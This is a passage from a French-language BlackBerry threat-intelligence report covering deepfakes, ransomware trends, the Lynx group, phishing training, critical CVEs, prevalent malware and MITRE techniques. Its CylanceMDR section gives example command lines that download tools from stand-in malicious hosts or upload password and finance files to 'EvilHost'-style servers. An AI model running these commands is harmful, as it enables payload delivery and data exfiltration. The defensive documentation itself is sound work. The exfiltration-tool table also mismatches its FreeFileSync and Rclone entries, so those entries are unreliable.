Les implications pour les entreprises sont profondes. Lorsque les parties prenantes ne peuvent plus se fier à l'authenticité des communications des dirigeants, tous les aspects des opérations sont affectés, qu'il s'agisse d'annonces qui bouleversent le marché ou de directives stratégiques internes. Le secteur des services bancaires et financiers est apparu comme la cible principale, confronté à des défis sans précédent pour maintenir des communications sécurisées et des processus de vérification des transactions. Comme le souligne M. Sircar, "l'aspect le plus préoccupant de ces "deepfakes" est le risque d'érosion de la confiance - la confiance dans les systèmes qui sont légitimes, qui sont vrais".

Les entreprises prévoyantes se positionnent déjà en amont des nouvelles exigences réglementaires, notamment la loi américaine No AI Fraud Act et la législation canadienne sur les médias non consensuels. Ces évolutions réglementaires signalent un changement crucial dans la manière dont les entreprises doivent aborder la sécurité des communications et la vérification de l'identité.

À mesure que les logiciels d'altération de la voix profonde et de l'IA générative s'améliorent, il est probable que ces outils seront utilisés plus fréquemment dans un nombre croissant d'attaques ciblées. Si vous souhaitez en savoir plus sur les deepfakes, y compris sur les mesures d'atténuation que vous pouvez utiliser pour protéger votre organisation, vous pouvez télécharger notre livre blanc sur les deepfakes ici, ou écouter notre discussion complète avec Shiladitya Sircar sur le podcast Unsupervised Learning (apprentissage non supervisé).

Si vous pensez avoir été victime d'une fraude de type "deepfake", vous pouvez déposer un rapport auprès de l'Internet Crime Complaint Center du FBI à l'adresse suivante : www.ic3.gov.

L'application de la loi sous les feux de la rampe

BlackBerry travaille avec des organismes d'application de la loi dans le monde entier pour améliorer la collaboration public-privé sur la cybersécurité. Depuis le rapport de septembre 2024 sur les menaces mondiales, BlackBerry a commencé à collaborer avec le Centre national de coordination de la cybercriminalité (NC3) de la Gendarmerie royale du Canada afin de partager des renseignements. Les informations suivantes ont été fournies par le NC3 pour mettre en évidence les tendances de la cybercriminalité du point de vue de l'application de la loi.
L'application de la loi sous les feux de la rampe

Historique : La montée en puissance des groupes de ransomwares

L'écosystème des ransomwares a considérablement évolué depuis la première attaque enregistrée en 1989, lorsque le cheval de Troie du SIDA a été mis en circulation. L'évolution des ransomwares a été progressive avant l'émergence des crypto-monnaies en 2010. L'ère du bitcoin a toutefois entraîné une croissance rapide des cybermenaces, en particulier au cours de la dernière moitié de la décennie.

En 2019, des groupes tels que MAZE, Ryuk et Sodinokibi/REvil ont fait des ravages en chiffrant des systèmes et des réseaux informatiques et en exigeant des paiements pour obtenir les clés de déchiffrement. Il s'agissait d'une stratégie d'attaque efficace à l'époque, car peu d'organisations conservaient des sauvegardes de leurs systèmes et encore moins disposaient de plans d'intervention en cas de cyberincident.

 

La menace des ransomwares en constante évolution

À cette époque, les opérations de ransomware étaient considérées comme des groupes criminels organisés traditionnels : des cybercriminels compétents s'unissaient pour une cause ou un objectif commun. Depuis, les groupes de ransomware sont devenus des adversaires très adaptables et, à mesure que les pratiques de cybersécurité se sont améliorées, les tactiques, techniques et procédures (TTP) des opérateurs de ransomware se sont elles aussi améliorées.

Pour s'assurer un gain financier, les groupes de ransomware sont passés d'une tactique d'extorsion simple (cryptage des données uniquement) à une tactique d'extorsion double, exigeant le paiement d'une rançon en échange de la clé de décryptage et, en outre, pour éviter que les données volées ne soient vendues sur le dark web.

Le nombre d'opérations de ransomware n'a cessé d'augmenter, les anciens groupes se rebaptisant, de nouveaux groupes entrant dans l'écosystème et de nouveaux modèles commerciaux émergeant. Parmi les avancées notables de ces dernières années, on peut citer le "Ransomware-as-a-Service" (RaaS), ainsi que des méthodes de chiffrement plus rapides, de meilleures techniques d'obscurcissement et la possibilité de cibler plusieurs systèmes d'exploitation.

Si certains ransomwares continuent de chiffrer les fichiers et les systèmes, d'autres ont choisi de renoncer à cette étape et de passer à un modèle d'exfiltration uniquement. Ce changement d'approche est probablement une réponse à l'adoption de meilleures pratiques de cybersécurité et à l'utilisation accrue des sauvegardes de systèmes et des services de reprise après sinistre.

Un troisième élément de l'extorsion

Plus récemment, les opérations de ransomware ont ajouté un troisième élément d'extorsion. Au lieu de se contenter d'exfiltrer des données et de menacer de les publier en ligne, certains ransomwares prennent le temps d'analyser les données volées et de les utiliser pour accroître la pression sur les victimes qui refusent de payer. Cette stratégie peut consister à communiquer les coordonnées ou à dénoncer les membres de la famille des PDG et des propriétaires d'entreprise ciblés, ainsi qu'à menacer de signaler aux autorités toute information sur des activités commerciales illégales découverte dans les données volées. Les opérateurs de ransomware peuvent menacer de contacter des clients ou des consommateurs, ou pire, de lancer d'autres attaques si les demandes de rançon ne sont pas satisfaites.

En outre, le NC3 a vu apparaître un nombre considérable de nouvelles variantes de ransomware. L'écosystème des ransomwares semble composé de groupes hétérogènes d'individus possédant des compétences allant de l'ingénierie sociale au courtage d'accès initial, en passant par le cryptage avancé, le développement de logiciels malveillants, la négociation et même les relations publiques. L'écosystème des ransomwares est un réseau interconnecté complexe. La lutte contre les opérations de ransomware nécessite une approche tout aussi complexe et multidisciplinaire.

Défis en matière d'application de la loi

Pour les services chargés de l'application de la loi, l'évolution constante des ransomwares représente un défi considérable qui nécessite des solutions innovantes. Les rançongiciels constituent une menace mondiale de premier plan, et il est probable qu'ils persisteront tant que les victimes continueront à payer.

Les mesures de répression prises par le passé contre des groupes de ransomware très médiatisés tels que Hive, BlackCat et LockBit nous ont appris que les auteurs de ransomware peuvent rapidement adapter leurs tactiques pour contrecarrer les efforts des forces de l'ordre. Ces efforts d'adaptation ont fragmenté l'écosystème des ransomwares, obligeant les forces de l'ordre à adopter des stratégies à multiples facettes qui incluent des méthodes créatives pour perturber les opérations (par exemple, en ciblant l'infrastructure, la réputation et la confiance).

Les 10 principales menaces de ransomware au Canada

Le NC3 travaille en étroite collaboration avec les services de police nationaux et internationaux, les partenaires gouvernementaux, le secteur privé et le monde universitaire afin d'améliorer en permanence la réponse des services de police canadiens à la cybercriminalité. Outre sa contribution et son soutien à des opérations spécifiques de répression de la cybercriminalité, le Centre national de coordination de la lutte contre la cybercriminalité suit régulièrement l'évolution du paysage de la cybermenace et procède à une évaluation triennale des opérateurs de ransomwares ciblant le Canada. Cette évaluation systématique permet d'informer le secteur de la cybersécurité de l'évolution de l'écosystème de la cybercriminalité et d'orienter les ressources d'enquête.

Le tableau ci-dessous présente les menaces de ransomware les plus répandues au Canada pour la période de mai à août 2024, qui coïncide avec la période couverte par le présent rapport.

Figure 8 : Menaces de ransomware au Canada, mai - août 2024.
Figure 8 : Menaces de ransomware au Canada, mai - août 2024.

Pleins feux sur les groupes émergents - Lynx Ransomware

Le groupe de ransomwares Lynx est apparu pour la première fois dans le paysage des menaces en juillet 2024 et a rapidement fait plus de 25 victimes au cours des mois suivants. Les organisations ciblées étaient réparties dans un large éventail de secteurs d'activité et se trouvaient principalement en Amérique du Nord et en Europe.

Qu'est-ce que le Groupe Lynx ?

Le groupe Lynx, comme de nombreux opérateurs de ransomware aujourd'hui, utilise une stratégie de double extorsion. Après avoir accédé illégalement à un système ou à un réseau, ils exfiltrent d'abord les données sensibles avant de les chiffrer, ce qui les rend inaccessibles au propriétaire. Ils menacent ensuite de rendre les données publiques si la rançon n'est pas payée. Lorsqu'une organisation est victime d'une intrusion de Lynx, le groupe publie un article de blog sur un site de fuite - accessible via l'internet public ou le dark web, ou parfois les deux - "nommant et dénonçant" la victime.

Figure 9 : Capture d'écran du site de fuites du dark web Lynx.
Figure 9 : Capture d'écran du site de fuites du dark web Lynx.
Les données volées peuvent être exploitées par le groupe lors de la négociation de la rançon, avec la menace de publier d'autres informations si la victime ne répond pas à d'autres demandes de rançon.

Industries et régions ciblées par Lynx

Dans les images ci-dessous, vous pouvez voir les domaines et les industries où Lynx est le plus présent. Lynx s'adresse principalement aux organisations nord-américaines et australiennes, mais aussi au Royaume-Uni et à certaines parties de l'Europe.
Industries et régions ciblées par Lynx
Figure 10 : Répartition géographique des victimes de Lynx.
Figure 11 : Principales industries ciblées par Lynx.

Fonctionnement de Lynx

Lynx dispose d'un site web en surface et d'un site de fuite en profondeur, ainsi que d'une série de sites miroirs situés à des adresses ".onion" - vraisemblablement pour garantir la disponibilité au cas où l'un de leurs sites serait mis hors ligne par les forces de l'ordre. Ils utilisent également leur propre crypteur qui, après un examen plus approfondi par les chercheurs de BlackBerry, semble avoir été développé à partir de la même base de code que celle utilisée par le tristement célèbre groupe INC Ransom.

À ce jour, une poignée d'échantillons liés à l'encrypteur utilisé par le groupe Lynx ont été identifiés dans la nature. Tous les échantillons semblent être écrits en C++ et ne présentent aucune forme d'emballage ou d'obscurcissement susceptible d'entraver l'analyse.

Une fois que les objectifs préalables au chiffrement, tels que l'obtention de l'accès initial et l'exfiltration des données, ont été réalisés, le ransomware est déployé dans l'environnement de la victime. Le ransomware lui-même est conçu pour être exécuté via la console de ligne de commande, avec plusieurs arguments optionnels. Cela permet à un attaquant de personnaliser son approche du chiffrement des fichiers pour atteindre ses objectifs.

Lors de son exécution, le logiciel malveillant dispose en outre d'un mode "--verbose" qui permet d'imprimer une liste des opérations effectuées par le ransomware lors de son exécution dynamique.

Fonctionnement de Lynx
Figure 12 : Crypteur Lynx fonctionnant en mode verbeux.

Pour éviter que l'appareil de la victime ne devienne inutilisable, le logiciel malveillant omet de chiffrer certains types de fichiers et de dossiers Windows. Cela permet d'accélérer le chiffrement et d'éviter que des programmes Windows essentiels ne deviennent inaccessibles, ce qui aurait pour effet de "briquer" l'appareil et de ruiner les chances du groupe d'obtenir une rançon.

Pour une analyse plus détaillée de cette menace émergente, lisez notre rapport complet sur Lynx.

Mesures de sécurité opérationnelle

Une formation régulière à la sensibilisation à la sécurité est essentielle pour cultiver une culture organisationnelle vigilante. Il convient de mettre l'accent sur des sujets tels que la prévention de l'hameçonnage, la sécurité des informations d'identification et la sécurité de l'accès à distance.

  • Tactique : mettre en œuvre un programme de formation "Repérer le drapeau rouge" dans le cadre duquel les employés reçoivent des courriels de phishing simulés contenant des éléments trompeurs courants, suivis d'un retour d'information immédiat expliquant chaque indicateur suspect. Suivez les taux de réponse des employés et proposez une formation de suivi ciblée en fonction des performances individuelles.
  • Exemple : Un détaillant international réduit considérablement ses incidents de phishing en lançant un programme de formation complet associé à un système robuste de gestion des correctifs afin de remédier rapidement aux vulnérabilités.
  • Il suffit qu'un employé clique sur un lien malveillant pour compromettre les systèmes et l'infrastructure d'une organisation. Voici un exemple de message d'hameçonnage à intégrer dans votre formation.
Figure 13a : Demande de connexion typique qu'un employé peut recevoir.
Figure 13a : Demande de connexion typique qu'un employé peut recevoir.
Cependant, un examen plus approfondi révèle les caractéristiques typiques d'un courriel d'hameçonnage (figure 13b) :
Figure 13b : Drapeaux rouges à surveiller dans un courriel de phishing.
Figure 13b : Drapeaux rouges à surveiller dans un courriel de phishing.
  1. L'adresse électronique de l'expéditeur prétend provenir de "linkedincdn.com" plutôt que du domaine officiel LinkedIn.com - il s'agit d'une technique classique d'usurpation de domaine.
  2. Une bannière d'avertissement indique qu'il s'agit d'une source externe. Il s'agit d'une fonction de sécurité utile que de nombreuses organisations choisissent de mettre en œuvre.
  3. Le message utilise deux tactiques classiques d'ingénierie sociale. Il prétend provenir d'un cadre de haut niveau (CISO) de l'organisation de la cible et utilise la flatterie ("j'ai entendu de bonnes choses à votre sujet") pour encourager l'engagement.
  4. La copie présente des incohérences de formatage : des irrégularités orthographiques et grammaticales peuvent être relevées tout au long de la copie.
  5. Bien que la photo de profil donne l'impression d'être authentique, elle peut être facilement copiée à partir d'un profil légitime par quiconque sait comment faire un clic droit et sélectionner "Enregistrer l'image sous".
  6. L'apparence générale de l'e-mail imite les messages automatisés couramment envoyés aux utilisateurs par les sites de médias sociaux.
    • Les boutons "Accepter" et "Voir le profil" sont probablement des liens malveillants qui peuvent conduire à des pages de collecte d'informations d'identification ou à des téléchargements de logiciels malveillants.
    • Le lien "Se désabonner" en bas de page peut également être malveillant. Les hameçonneurs l'incluent souvent pour donner l'impression qu'il s'agit d'un message légitime, alors qu'il conduit en fait les utilisateurs vers un contenu plus dangereux.

Aidez vos employés à apprendre à :

  • Vérifiez soigneusement les domaines de l'expéditeur.
  • Méfiez-vous des demandes de connexion non sollicitées, en particulier de la part de cadres supérieurs.
  • Ne cliquez jamais sur les boutons ou les liens contenus dans les courriels suspects - ils doivent plutôt visiter le site référencé en tapant l'URL directement dans leur navigateur.
  • Prêtez attention aux avertissements de sécurité de leur système de courrier électronique.
  • Méfiez-vous de la flatterie ou de l'urgence dans les demandes inattendues de mise en réseau professionnel.

Les cybercriminels affinent sans cesse leurs cyberattaques pour en renforcer l'impact. Pour se défendre contre ces menaces en constante évolution, les organisations doivent adopter une approche prospective des stratégies de défense en matière de cybersécurité. Cela implique d'investir stratégiquement dans des technologies telles que la surveillance de la sécurité, la formation du personnel et la réponse aux incidents, afin de s'assurer qu'elles sont prêtes à faire face à des cybermenaces sophistiquées.

Cyber Story Highlight : Le cheval de Troie bancaire Coyote cible l'Amérique latine et plus particulièrement les institutions financières brésiliennes

En juillet 2024, les chercheurs de BlackBerry ont découvert une campagne dans laquelle Coyote a été déployé pour cibler les banques brésiliennes et les échanges de crypto-monnaies. La tendance croissante des trojans bancaires géociblés souligne la nécessité d'une cybersécurité solide et d'une éducation des utilisateurs pour lutter contre les menaces de phishing et d'ingénierie sociale comme Coyote. Dans la section Atténuations de ce rapport, vous trouverez d'autres idées de sécurité exploitables à partager au sein de votre organisation.

CylanceMDR: Menaces et mesures d'atténuation

Les organisations sont confrontées à des menaces provenant non seulement des logiciels malveillants des acteurs de la menace, mais aussi de l'utilisation abusive d'outils légitimes. Cette section met en évidence les menaces les plus répandues que l'équipe CylanceMDR™ a rencontrées dans les environnements réseau des clients ce trimestre, ainsi que les mesures d'atténuation que les organisations peuvent utiliser pour renforcer leurs cyberdéfenses.

CylanceMDR est notre service MDR par abonnement qui assure une surveillance 24 heures sur 24 et 7 jours sur 7 et aide les organisations à stopper les cybermenaces sophistiquées en comblant les lacunes des environnements de sécurité.

Activité LOLBAS

Activité LOLBAS

LOLBAS désigne les outils intégrés au système Windows et les exécutables légitimes que les attaquants peuvent utiliser à des fins malveillantes. L'expression "vivre sur le terrain" signifie utiliser des outils qui sont déjà présents dans l'environnement cible ("le terrain"), plutôt que de risquer d'introduire de nouveaux logiciels malveillants qui pourraient déclencher les systèmes de sécurité et alerter la cible sur le fait qu'elle a été compromise. Le danger des attaques basées sur le LOLBAS réside dans leur capacité à contourner les contrôles de sécurité puisqu'elles utilisent des outils système légitimes. Cela rend la détection difficile, car les activités du système peuvent sembler normales à première vue.

Au cours de cette période, l'activité LOLBAS suivante a été observée :

  • Bitsadmin reste le LOLBAS le plus observé.
  • Certutil est le deuxième produit le plus observé, bien que son utilisation ait diminué depuis la dernière période de référence.
  • Regsvr32, MSHTA et PsExec ont également été observés, mais ils ne représentent qu'un faible pourcentage de l'activité globale.

Nous présentons ci-dessous un exemple d'utilisation malveillante de LOLBAS.

Figure 14 : Activité du LOLBAS, juillet-septembre 2024.

Fichier : Bitsadmin.exe

MITRE ATT&CK ID: T1197 | T1105
How It Can Be Abused: Download/upload from or to malicious host (Ingress tool transfer). Can be used to execute malicious process.
Example Command-Line:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest

Fichier : mofcomp.exe

MITRE ATT&CK ID: T1218
How It Can Be Abused: Can be used to install malicious managed object format (MOF) scripts.
MOF statements are parsed by the mofcomp.exe utility and will add the classes and class instances defined in the file to the WMI repository.
Example Command-Line:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof

Outils d'exfiltration

Outils d'exfiltration

Les outils d'exfiltration sont des logiciels utilisés pour transférer des données hors d'un environnement cible, souvent à des fins malveillantes. Ce trimestre, l'équipe CylanceMDR a passé en revue les outils les plus courants susceptibles d'être utilisés pour l'exfiltration (à l'exclusion des outils RMM) dans les environnements de nos clients.

Figure 15 : Pourcentage d'outils d'exfiltration utilisés de manière abusive, juillet-septembre 2024.

WinSCP

Description: WinSCP est un client de transfert de fichiers ; PuTTY est un client SSH (Secure Shell).

Exemple de ligne de commande: winscp.exe scp://test : P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Note: couramment utilisé avec une interface utilisateur graphique (GUI).

MITRE ATT&CK ID : T1048

PSCP

Description: PuTTY Secure Copy Protocol (PSCP) est un utilitaire de ligne de commande utilisé pour le transfert de fichiers et de dossiers.

Exemple de ligne de commande: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID : T1021.004

FileZilla

Description : FileZilla est un outil de protocole de transfert de fichiers (FTP) bien connu qui peut être utilisé sur différents systèmes d'exploitation.

Exemple de ligne de commande : filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

MITRE ATT&CK ID : T1071.002

FreeFileSync

Description : PuTTY Secure Copy Protocol (PSCP) est un utilitaire de ligne de commande utilisé pour le transfert de fichiers et de dossiers.

Exemple de ligne de commande : pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

MITRE ATT&CK ID : T1021.004

Rclone

Description : FreeFileSync est un outil de synchronisation qui peut être utilisé pour gérer les sauvegardes.

Exemple de ligne de commande : FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

MITRE ATT&CK ID : T1567.002

Outils de surveillance et de gestion à distance

Outils de surveillance et de gestion à distance

Les acteurs de la menace abusent des outils RMM. Ces outils offrent aux attaquants un moyen facile de maintenir un accès simple et persistant aux systèmes et un moyen efficace d'exfiltrer des données. Comme nous l'avons indiqué dans notre précédent rapport mondial de veille sur les menaces, il s'agit de la catégorie qui connaît la croissance la plus rapide pour les groupes de ransomwares qui utilisent ces outils pour exfiltrer les données des environnements des victimes. Au cours de la période couverte par ce rapport, l'équipe CylanceMDR a examiné les outils RMM les plus couramment exploités dans les environnements de nos clients.

Au cours de notre analyse, nous avons constaté que de nombreux clients utilisent plusieurs outils RMM dans leur environnement, ce qui augmente la surface d'attaque et les risques de leur organisation.

Figure 16 : Ce graphique illustre le pourcentage d'attaques exécutées en utilisant abusivement les principaux outils RMM.

 

Les mesures d'atténuation suggérées sont les suivantes

1. Audit des outils d'accès à distance

  • Identifier les outils RMM actuellement utilisés au sein de l'organisation.
  • Confirmer qu'ils sont approuvés dans l'environnement.
  • Si vous utilisez plusieurs outils RMM, déterminez s'il est possible de les consolider. En réduisant le nombre d'outils différents utilisés, on réduit le risque.

2. Désactiver les ports et les protocoles

  • Bloquer les communications réseau entrantes et sortantes vers les ports couramment utilisés et associés à des outils d'accès à distance non approuvés.
  • Utilisez des règles de refus par défaut et des listes d'autorisation plutôt qu'une approche de liste de blocage lorsqu'il s'agit de règles de pare-feu et de contrôle des applications.

3. Surveiller l'activité des terminaux et le trafic réseau

  • Détecter l'utilisation anormale des outils d'accès à distance.

4. Patching

  • Assurer un examen régulier des vulnérabilités associées aux outils RMM autorisés utilisés, en procédant aux mises à jour nécessaires.
  • Donner la priorité aux systèmes accessibles par l'internet lors des cycles de correctifs réguliers.

5. Segmentation du réseau

  • Minimiser les mouvements latéraux malveillants en segmentant le réseau et en limitant l'accès aux appareils et aux données.

6. Marquage des appareils

  • Vérifiez si votre fournisseur de solutions de sécurité propose des options permettant de marquer les dispositifs qui utilisent des outils RMM. Si c'est le cas, activez cette option pour garantir la visibilité de votre SOC. Certains fournisseurs proposent des options permettant de laisser une note/étiquette identifiant les outils/activités approuvés, ce qui aide grandement les analystes lors des enquêtes.

7. RMM à chargement de mémoire

  • Utilisez un logiciel de sécurité capable de détecter les accès à distance qui ne sont chargés que dans la mémoire.

CylanceMDR Principales menaces trimestrielles

Les menaces les plus courantes détectées et traitées par l'équipe d'analystes de CylanceMDR au cours de la période couverte par le présent rapport sont énumérées ci-dessous.
Figure 17 : Principales menaces détectées et traitées par l'équipe d'analystes de CylanceMDR au cours de ce trimestre.
Figure 17 : Principales menaces détectées et traitées par l'équipe d'analystes de CylanceMDR au cours de ce trimestre.

En point de mire : Alertes de l'équipe de réponse aux incidents de BlackBerry

L'équipe BlackBerry Incident Response (IR) du site offre des solutions aux organisations victimes d'une attaque de logiciels malveillants ou d'une violation présumée de données. Au cours de ce trimestre, notre équipe IR a constaté une augmentation des attaques impliquant des services connectés à Internet et l'utilisation abusive des informations d'identification d'anciens employés.

Les dispositifs faisant face à Internet, tels que les dispositifs VPN, ont été ciblés plus que d'habitude ce trimestre. Malheureusement, ces types d'appareils peuvent ne pas être suffisamment sécurisés par l'authentification multifactorielle. Dans certains cas, cette absence d'authentification multifactorielle a permis à des acteurs menaçants de déployer des ransomwares ou d'autres logiciels malveillants dans l'environnement d'un client et d'exfiltrer les données de l'entreprise. Cela souligne la nécessité pour les entreprises de sécuriser correctement tous les systèmes exposés à Internet en temps opportun(MITRE - External Remote Services) et de réduire la surface d'attaque lorsque cela est possible, en utilisant des alternatives modernes telles que les solutions Zero Trust Network Access (ZTNA).

L'utilisation abusive des identifiants de comptes d'anciens employés est une autre pratique courante. Alors que les identifiants des employés devraient être déprovisionnés dès qu'ils quittent l'entreprise, ce n'est pas toujours le cas. Les anciens comptes peuvent potentiellement donner à un acteur de la menace un accès complet au réseau et aux systèmes de l'organisation. Cela souligne la nécessité pour les entreprises de mettre en œuvre des contrôles de sécurité d'authentification forts sur tous les systèmes(MITRE - Valid Accounts).

Vulnérabilités et expositions courantes

Impact et statistiques

Le système CVE (Common Vulnerabilities and Exposures) offre un cadre pour l'identification, la normalisation et la publication des vulnérabilités et expositions connues en matière de sécurité. De juillet à septembre 2024, le National Institute of Standards and Technology (NIST) a signalé 8 659 nouveaux CVE.

Bien que moins de CVE aient été découverts ce trimestre par rapport au précédent, le niveau de criticité de ces CVE a augmenté de manière significative. Au trimestre dernier, 8 % des CVE avaient un niveau de gravité de 9,0 ou plus, alors que ce trimestre, ce pourcentage a atteint un nouveau record de 14 %.

Figure 18 : Notation CVE juillet - septembre 2024.

Les CVE les plus critiques enregistrés ce trimestre :

CVE-2024-4879 (9.3 Critical) Exécution de code arbitraire: Cette vulnérabilité de ServiceNow permet à des utilisateurs non authentifiés d'exécuter du code à distance dans la plateforme Now. Elle implique une vulnérabilité d'injection de modèle Jelly quiexploite les macros de l'interface utilisateur de ServiceNow. Cette vulnérabilité peut potentiellement être enchaînée avec CVE-2024-5178 (6.9 Medium) Accès non autorisé et CVE-2024-5217 (9.2 Critical) Exécution de code arbitraire, permettant l'exécution de code à distance non autorisé sur les serveurs MID de ServiceNow.

CVE-2024-43491 (9.8 Critique) Exécution de code arbitraire: Concernant la pile de services de Microsoft, cette vulnérabilité réintroduit des vulnérabilités précédemment atténuées dans Windows 10. Elle permet l'exécution de code à distance sans interaction de l'utilisateur, ce qui peut entraîner la compromission totale du système. Une mise à jour de la pile de services et une mise à jour de sécurité de Windows ont été publiées pour corriger cette vulnérabilité.

CVE-2024-38194 (9.9 Critique) Contournement d'authentification: Cette vulnérabilité provient d'une mauvaise autorisation au sein des applications web Azure, permettant à un attaquant authentifié d'élever ses privilèges sur un réseau. Si elle est exploitée, elle peut compromettre la sécurité des applications et des systèmes connectés, entraînant un accès non autorisé aux données, une interruption de service ou une modification malveillante du comportement de l'application.

CVE-2024-21416 (9.8 Critique) Exécution de code arbitraire: Liée à une vulnérabilité d'exécution de code à distance (RCE) de Windows TCP/IP, cette exploitation pourrait permettre à des attaquants d'exécuter du code arbitraire sur le système cible, et potentiellement d'obtenir un accès complet.

CVE-2024-47575 (9.8 Critique) Contournement d'authentification: Divulgué juste après la période de rapport, l'exploit connu sous le nom de "FortiJump" et suivi comme CVE-2024-47575 implique des attaques zero-day par l'acteur de menace UNC5820 nouvellement divulgué. Il abuse d'une faille pour exécuter des commandes API, ce qui permet aux attaquants de contourner l'authentification et d'exécuter des commandes sur des systèmes exploitables. L'avis d'octobre de Fortinet indique que cette vulnérabilité "peut permettre à un attaquant distant non authentifié d'exécuter un code ou des commandes arbitraires par le biais de requêtes spécialement conçues."

Menaces prévalentes par plate-forme : Windows

FakeUpdates/SocGholish

Téléchargeur

Téléchargeur basé sur JavaScript qui présente aux utilisateurs de fausses mises à jour de navigateur. Il est connu pour télécharger des charges utiles supplémentaires, notamment AZORult, GootLoader et RedLine.

Formbook/xLoader

Voleur d'informations    

Malware sophistiqué fonctionnant à la fois comme un voleur d'informations et un téléchargeur. Il utilise des techniques anti-VM, l'injection de processus et des routines de chiffrement personnalisées pour contourner les défenses de cybersécurité. Vole des données à partir de navigateurs, de clients de messagerie et de diverses applications.

QakBot

Botnet/Dropper

Découvert pour la première fois en 2008, il en est aujourd'hui à sa version 5.0. Il offre des possibilités étendues d'exfiltration de données et de déplacement latéral. Il est connu pour diffuser plusieurs types de logiciels malveillants après l'installation.

Agent Tesla

Voleur d'informations

Un voleur d'informations basé sur .NET vendu en tant que MaaS et principalement utilisé pour la collecte d'informations d'identification. Malgré le démantèlement de l'infrastructure par le FBI et le DOJ en 2023, il est réapparu avec de nouveaux mécanismes de persistance pour survivre à la restauration de l'hôte.

njRAT

Trojan d'accès à distance

La RAT s'est concentrée sur la capture des données des utilisateurs, avec des capacités telles que l'accès par caméra, le vol d'informations d'identification, la surveillance de l'interaction des fichiers et l'enregistrement des frappes au clavier.

AsyncRAT

Trojan d'accès à distance

Généralement diffusé en même temps que d'autres logiciels malveillants. Reçoit des commandes du serveur C2 pour capturer les données de l'utilisateur et mettre fin à des processus spécifiques. Comporte des capacités de réseau de zombies.

LummaC2

Voleur d'informations

Un voleur d'informations basé sur la technologie C et ciblant les entreprises commerciales et les organisations d'infrastructures critiques. Il se concentre sur l'exfiltration de données sensibles et est distribué via des forums clandestins et des groupes Telegram.

Remcos

Trojan d'accès à distance

Application de contrôle et de surveillance à distance conçue pour l'accès à distance non autorisé et le contrôle des appareils.

RedLine

Voleur d'informations

Utilise diverses applications et services pour exfiltrer les données des victimes, notamment les informations relatives aux cartes de crédit, les mots de passe et les cookies.

Phorpiex

Botnet

Botnet axé sur la diffusion de logiciels malveillants, connu pour son implication dans des campagnes d'extorsion de fonds à caractère sexuel.

Menaces prévalentes par plate-forme : Linux

Mirai

Botnet

Reste très actif, la dernière version exploitant des vulnérabilités de type "zero-day" dans les caméras de télévision en circuit fermé. La variante "Corona" se propage par l'injection de codes malveillants dans les caméras compromises.

Gafgyt/Bashlite

Botnet

Botnet Linux axé sur l'IdO utilisant des serveurs C2 pour des attaques DDoS à grande échelle. La dernière version cible les mots de passe SSH faibles pour le minage de crypto-monnaie sur GPU.

Play Ransomware

Ransomware

Nouvelle variante ciblant spécifiquement les environnements ESXi, marquant la première extension du groupe aux systèmes Linux par rapport à ses précédentes attaques de double extorsion centrées sur Windows. Cryptage sélectif des fichiers dans les environnements Linux ESXi.

Hadooken

Botnet

Nouveau logiciel malveillant pour Linux combinant des capacités de minage de crypto-monnaie et des outils d'attaque DDoS. Il cible les vulnérabilités de systèmes tels que le serveur Oracle WebLogic.

Menaces prévalentes par plate-forme : macOS

Voleur atomique (AMOS)

Voleur d'informations

De nouvelles variantes déguisées en diverses applications sont distribuées via des images disques DMG. Il cible les mots de passe, les cookies des navigateurs, les données de remplissage automatique, les portefeuilles de crypto-monnaie et les données du trousseau de clés du Mac.

Chtulu

Voleur d'informations

Un voleur d'informations basé sur MaaS distribué sous la forme d'un trojan DMG. Les activités post-infection comprennent la récolte de mots de passe de trousseau, de cookies de navigateur, d'informations de compte Telegram, de portefeuilles de crypto-monnaies et de données d'utilisateur pour le téléchargement sur le serveur C2.

Macma

Porte dérobée

Mises à jour récentes attribuées au groupe APT chinois Evasive Panda. Établit la persistance avant de déployer des capacités de keylogger et de capture de médias pour l'exfiltration de données vers des serveurs C2.

TodoSwift

Téléchargeur

Distribué par le biais de leurres PDF de tarification Bitcoin. Attribué au groupe nord-coréen BlueNoroff et capable de télécharger d'autres binaires malveillants par le biais de connexions à des serveurs C2.

Menaces prévalentes par plateforme : Android

Necro Trojan

Téléchargeur

Distribué via le magasin Google Play et des kits de développement de logiciels (SDK) malveillants. Les capacités comprennent le lancement de publicités invisibles, le téléchargement de charges utiles supplémentaires, l'installation d'applications tierces, l'exécution de codes supplémentaires et la communication avec le serveur C2.

Octo2

Voleur d'informations

Distribué par le biais de versions trojanisées de NordVPN et de Google Chrome. Variante d'Exobot qui cible principalement les informations bancaires avec des capacités d'accès à distance et de communication avec des serveurs C2.

Ajina

Voleur d'informations

Distribué par le biais de l'ingénierie sociale et du phishing, en particulier via Telegram. Vole les identifiants bancaires et les données SMS pour intercepter l'authentification 2FA des applications bancaires.

Techniques courantes de MITRE

Comprendre les techniques de haut niveau des groupes de menace peut aider à décider des techniques de détection à privilégier. BlackBerry a observé les 20 techniques suivantes utilisées par les acteurs de la menace au cours de la période de référence.

Figure 19 : Les 20 techniques MITRE les plus observées, de juin à septembre 2024.

Techniques détectées

Le tableau suivant présente les 20 techniques les plus utilisées par les acteurs de la menace au cours de ce trimestre. Une flèche vers le haut (↑) dans la colonne "Changement" indique que l'utilisation de la technique a augmenté depuis notre dernier rapport. Une flèche vers le bas (↓) indique que l'utilisation a diminué depuis notre dernier rapport. Un symbole égal (=) indique que la technique reste dans la même position que dans notre dernier rapport.

Nom de la technique ID de la technique Nom de la tactique Dernier rapport Changer
Flux d'exécution du détournement
T1574
Persistance, escalade des privilèges, évasion des défenses
1
=
Chargement latéral de DLL
T1574.002
Persistance, escalade des privilèges, évasion des défenses
2
=
Virtualisation/
Évasion du bac à sable
T1497
Défense, évasion, découverte
NA
Découverte d'informations sur le système
T1082
Découverte
5
Capture d'entrée
T1056
Accès aux données d'identification, Collecte
4
Découverte de logiciels
T1518
Découverte
6
=
Découverte de logiciels de sécurité
T1518.001
Découverte
